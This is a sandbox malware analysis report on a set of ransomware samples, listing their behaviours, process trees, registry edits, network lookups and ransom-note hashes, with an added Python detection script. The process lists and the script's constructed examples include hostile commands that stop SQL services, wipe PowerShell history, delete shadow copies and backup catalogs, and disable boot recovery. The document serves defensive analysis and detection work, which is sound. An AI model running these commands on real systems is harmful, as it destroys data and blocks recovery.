Malware Analysis Report

2024-09-22 15:34

Sample ID 240707-re689awdpe
Target RS.7z
SHA256 c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9
Tags
pyinstaller 512478c08dada2af19e49808fbda5b0b upx cryptone packer $2a$10$kmb3nsvqxc.93gyncgky/uq9hyhivf0e3hcajfiifr8hf3fmnofgm 7258 $2a$10$dfjplrxudytff.kmytq1rogsxjtjee8emqt65ftxltpjtxpzrhsaq 7178 blackmatter medusalocker mespinoza sodinokibi avoslocker ransomware spyware stealer darkside avaddon defense_evasion evasion execution impact persistence trojan babuk makop conti hive hades dearcry lockbit
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral3, behavioral9, behavioral15, behavioral11, behavioral16, behavioral19, behavioral1, behavioral4, behavioral8, behavioral10, behavioral31, behavioral14, behavioral22, behavioral27, behavioral28, behavioral20, behavioral26, behavioral23, behavioral25, behavioral29, behavioral2, behavioral13, behavioral24, behavioral32, behavioral5, behavioral6, behavioral12, behavioral17, behavioral7, behavioral18, behavioral21, behavioral30 (each: Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9

Threat Level: Known bad

The file RS.7z was found to be: Known bad.

Malicious Activity Summary

MedusaLocker payload

Makop

UAC bypass

Avoslocker Ransomware

Mespinoza family

Conti Ransomware

Detects Go variant of Hive Ransomware

Sodinokibi family

BlackMatter Ransomware

Avaddon

Blackmatter family

Hades payload

Hades Ransomware

Lockbit

Hive

Medusalocker family

DarkSide

Babuk Locker

DearCry

CryptOne packer

Modifies boot configuration data using bcdedit

Renames multiple (133) files with added filename extension

Renames multiple (179) files with added filename extension

Renames multiple (9368) files with added filename extension

Renames multiple (160) files with added filename extension

Renames multiple (3331) files with added filename extension

Renames multiple (150) files with added filename extension

Renames multiple (7382) files with added filename extension

Renames multiple (153) files with added filename extension

Renames multiple (162) files with added filename extension

Renames multiple (8801) files with added filename extension

Renames multiple (164) files with added filename extension

Renames multiple (77) files with added filename extension

Renames multiple (227) files with added filename extension

Deletes shadow copies

Renames multiple (180) files with added filename extension

Renames multiple (158) files with added filename extension

Renames multiple (1641) files with added filename extension

Renames multiple (450) files with added filename extension

Renames multiple (7310) files with added filename extension

Renames multiple (7995) files with added filename extension

Renames multiple (6418) files with added filename extension

Renames multiple (66) files with added filename extension

Renames multiple (174) files with added filename extension

Renames multiple (246) files with added filename extension

Renames multiple (257) files with added filename extension

Drops file in Drivers directory

Deletes backup catalog

Boot or Logon Autostart Execution: Active Setup

UPX packed file

Deletes itself

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Boot or Logon Autostart Execution: Print Processors

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Adds Run key to start application

Looks up external IP address via web service

Drops desktop.ini file(s)

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Detects Pyinstaller

Unsigned PE

Enumerates physical storage devices

NSIS installer

Uses Task Scheduler COM API

Modifies registry class

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

System policy modification

Suspicious behavior: EnumeratesProcesses

Modifies Control Panel

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Modifies system certificate store

Suspicious behavior: MapViewOfSection

Interacts with shadow copies

Checks SCSI registry key(s)

Runs ping.exe

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-07 14:07

Signatures

Blackmatter family

blackmatter

MedusaLocker payload

Description Indicator Process Target
N/A N/A N/A N/A

Medusalocker family

medusalocker

Mespinoza family

mespinoza

Sodinokibi family

sodinokibi

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A (2 identical rows)

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows)

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (32 identical rows)

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A (2 identical rows)

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240704-en

Max time kernel

1563s

Max time network

1570s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Renames multiple (77) files with added filename extension

ransomware

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A (64 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Network

N/A

Files

C:\MSOCache\GET_YOUR_FILES_BACK.txt

MD5 0237b63f764204e00d7242cc4d908271
SHA1 9d88e59463e2a963bea95d6a2cc5383e922f2f27
SHA256 7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857
SHA512 0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e

Analysis: behavioral9

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240704-en

Max time kernel

1799s

Max time network

1568s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A (64 identical rows)

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\$Recycle.Bin\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created F:\$RECYCLE.BIN\S-1-5-21-3450744190-3404161390-554719085-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2148 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe (3 identical rows)
PID 1660 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe (3 identical rows)
PID 2268 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)
PID 1660 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe (3 identical rows)
PID 1888 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Service *sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell rm (Get-PSReadlineOption).HistorySavePath
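The process tree above carries the two behaviours a detection engineer would key on: a cmd.exe child that stops every service matching *sql* (so database files are unlocked for encryption) and a second one that deletes the PSReadLine history file. Note that the powershell.exe child of PID 2268 is recorded with only "powershell Get-Service *sql*": this is consistent with cmd.exe having parsed the "|" itself, so a rule that inspects the powershell.exe command line alone never sees "Stop-Service", while the parent cmd.exe line carries the whole pipeline. The Python below is an added example, not part of the sandbox report. It runs command-line rules over the process entries listed above (PIDs and parent links taken from the WriteProcessMemory table; the root's parent PID 0 is an assumption) plus constructed vssadmin, wbadmin and bcdedit lines that stand in for the "Deletes shadow copies", "Deletes backup catalog" and "Modifies boot configuration data using bcdedit" signatures from the summary, whose command lines do not appear on this page. The rule patterns are the author's own, not the sandbox's signatures.

```python
import re

# (pid, ppid, command line). The first six entries are the behavioral9 process
# list from this report; the last four are constructed for the example.
SAMPLE_PROCESSES = [
    (2148, 0,    r'"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"'),
    (1660, 2148, r'"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"'),
    (2268, 1660, r'C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null'),
    (880,  2268, r'powershell Get-Service *sql*'),          # cmd.exe consumed the pipe
    (1888, 1660, r'C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath'),
    (1380, 1888, r'powershell rm (Get-PSReadlineOption).HistorySavePath'),
    (4001, 1660, r'vssadmin.exe delete shadows /all /quiet'),              # constructed
    (4002, 1660, r'wbadmin delete catalog -quiet'),                        # constructed
    (4003, 1660, r'bcdedit /set {default} recoveryenabled No'),            # constructed
    (4004, 1660, r'notepad.exe C:\Users\Admin\Documents\notes.txt'),       # constructed, benign
]

# Rule name -> pattern over the full command line (assumed patterns, case-insensitive).
RULES = {
    "stop_sql_services": re.compile(r"get-service\s+\S*sql\S*\s*\|\s*stop-service", re.I),
    "powershell_history_wipe": re.compile(r"get-psreadlineoption\)\.historysavepath", re.I),
    "shadow_copy_delete": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic\s+shadowcopy\s+delete", re.I),
    "backup_catalog_delete": re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I),
    "boot_recovery_disable": re.compile(
        r"bcdedit(?:\.exe)?\b.*(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I),
}


def scan(processes):
    """Return {pid: [rule names]} for every process whose command line fires a rule."""
    hits = {}
    for pid, _ppid, cmdline in processes:
        matched = [name for name, rx in RULES.items() if rx.search(cmdline)]
        if matched:
            hits[pid] = matched
    return hits


def ancestry(processes, pid):
    """Walk parent links back to the root; returns [root, ..., pid] for triage context."""
    parent_of = {p: pp for p, pp, _ in processes}
    chain = []
    while pid in parent_of:
        chain.append(pid)
        pid = parent_of[pid]
    return list(reversed(chain))


def ransomware_precursors(processes, threshold=2):
    """(verdict, distinct rules fired). One rule alone is weak evidence; several together are not."""
    fired = {rule for rules in scan(processes).values() for rule in rules}
    return len(fired) >= threshold, sorted(fired)


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_PROCESSES).items():
        print(pid, " -> ".join(map(str, ancestry(SAMPLE_PROCESSES, pid))), rules)
    print(ransomware_precursors(SAMPLE_PROCESSES))
```

Running it shows PID 2268 firing stop_sql_services while its powershell.exe child PID 880 fires nothing, which is why the rule has to look at the cmd.exe parent (or at the full process tree) rather than at powershell.exe alone.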

Network

Country Destination Domain Proto
US 8.8.8.8:53 mega.io udp
LU 89.44.169.132:80 mega.io tcp
LU 89.44.169.132:443 mega.io tcp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.16:443 g.api.mega.co.nz tcp
LU 66.203.125.16:443 g.api.mega.co.nz tcp

Files

C:\MSOCache\All Users\decrypt_file.TxT

MD5 a36d9aeb2b6bc7da5a8b336bbc4f542e
SHA1 f5caf80eccd8a2ee2095cfe4a3f2d796c6b47bc0
SHA256 3144df848208a9edef3e03d32a5ba4bf105186f48f7ed9e267876e4064681f9f
SHA512 a2aef5507e493340c95250f43227d8a6835c832d6a852e1b850e67ecccfa3934061220aa8bd94fa38721687681e9363f75ad364bb47c81c126c6f51fac682fa5

Analysis: behavioral15

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1560s

Max time network

1566s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

C:\Windows\SysWOW64\cmd.exe

/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL

Network

N/A

Files

memory/2108-0-0x0000000000520000-0x0000000000580000-memory.dmp

memory/2108-1-0x0000000000400000-0x000000000046C000-memory.dmp

C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\!!FAQ for Decryption!!.txt

MD5 69acb73a5829bdddc9a7cf322178c70f
SHA1 3cd71f6cc40c90322e027712403899db2976218b
SHA256 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5
SHA512 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e

Analysis: behavioral11

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240508-en

Max time kernel

1560s

Max time network

1562s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

Signatures

BlackMatter Ransomware

ransomware blackmatter

Renames multiple (180) files with added filename extension

ransomware

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\XS6hn5xhL.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\XS6hn5xhL.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\International C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 paymenthacks.com udp
US 8.8.8.8:53 paymenthacks.com udp
US 8.8.8.8:53 mojobiden.com udp
US 8.8.8.8:53 mojobiden.com udp
US 8.8.8.8:53 paymenthacks.com udp
US 8.8.8.8:53 paymenthacks.com udp
US 8.8.8.8:53 mojobiden.com udp
US 8.8.8.8:53 mojobiden.com udp

Files

memory/2576-0-0x0000000000200000-0x0000000000240000-memory.dmp

C:\XS6hn5xhL.README.txt

MD5 f66968c47a64569e2281f65a95991be0
SHA1 ef9e3e80bfbea4c3021b226cb8cd00687013b8a8
SHA256 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf
SHA512 cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24

Analysis: behavioral16

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1559s

Max time network

1541s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

C:\Windows\SysWOW64\cmd.exe

/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL

Network

Country Destination Domain Proto

Files

memory/2112-0-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2112-1-0x00000000022D0000-0x0000000002330000-memory.dmp

memory/2112-2-0x0000000000400000-0x000000000046C000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ink\ar-SA\!!FAQ for Decryption!!.txt

MD5 69acb73a5829bdddc9a7cf322178c70f
SHA1 3cd71f6cc40c90322e027712403899db2976218b
SHA256 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5
SHA512 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e

Analysis: behavioral19

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:39

Platform

win7-20240705-en

Max time kernel

1561s

Max time network

1567s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (179) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\a8e86c8e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\a8e86c8e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.a8e86c8e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.a8e86c8e\ = "a8e86c8e" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\a8e86c8e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\a8e86c8e.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_16_01_2021_59KB.exe N/A
